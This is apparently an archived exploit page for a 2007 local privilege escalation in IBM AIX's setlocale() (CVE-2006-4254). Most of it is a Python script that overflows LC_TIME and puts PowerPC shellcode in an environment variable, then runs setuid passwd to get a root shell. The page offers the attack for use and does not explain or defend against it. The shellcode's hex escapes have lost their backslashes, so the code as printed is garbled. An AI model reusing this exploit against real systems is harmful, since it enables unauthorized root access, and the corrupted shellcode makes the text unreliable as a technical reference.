IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit
# Published : 2007-11-07
# Author : Thomas Pollet
# Previous Title : Microsoft Jet Engine MDB File Parsing Stack Overflow PoC
# Next Title : Nullsoft Winamp 5.32 MP4 tags Stack Overflow Exploit

#
#setlocale() exploit for aix 5.2 ( CVE-2006-4254  )
#thomas.pollet@gmail.com
#
from os import execve

bof="a"*580+"bbbbccccddddx2fxf2x28x2f"
egg="x60"*2350
shellcode=(            # by intropy <at> caughq.org
"x7cxa5x2ax79"     # xor.    r5,r5,r5
"x40x82xffxfd"     # bnel    <shellcode>
"x7fxe8x02xa6"     # mflr    r31
"x3bxffx01x20"     # cal     r31,0x120(r31)
"x38x7fxffx08"     # cal     r3,-248(r31)
"x38x9fxffx10"     # cal     r4,-240(r31)
"x90x7fxffx10"     # st      r3,-240(r31)
"x90xbfxffx14"     # st      r5,-236(r31)
"x88x5fxffx0f"     # lbz     r2,-241(r31)
"x98xbfxffx0f"     # stb     r5,-241(r31)
"x4cxc6x33x42"     # crorc   cr6,cr6,cr6
"x44xffxffx02"     # svca
"/bin/sh"
"x05")

execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})

# www.Syue.com [2007-11-07]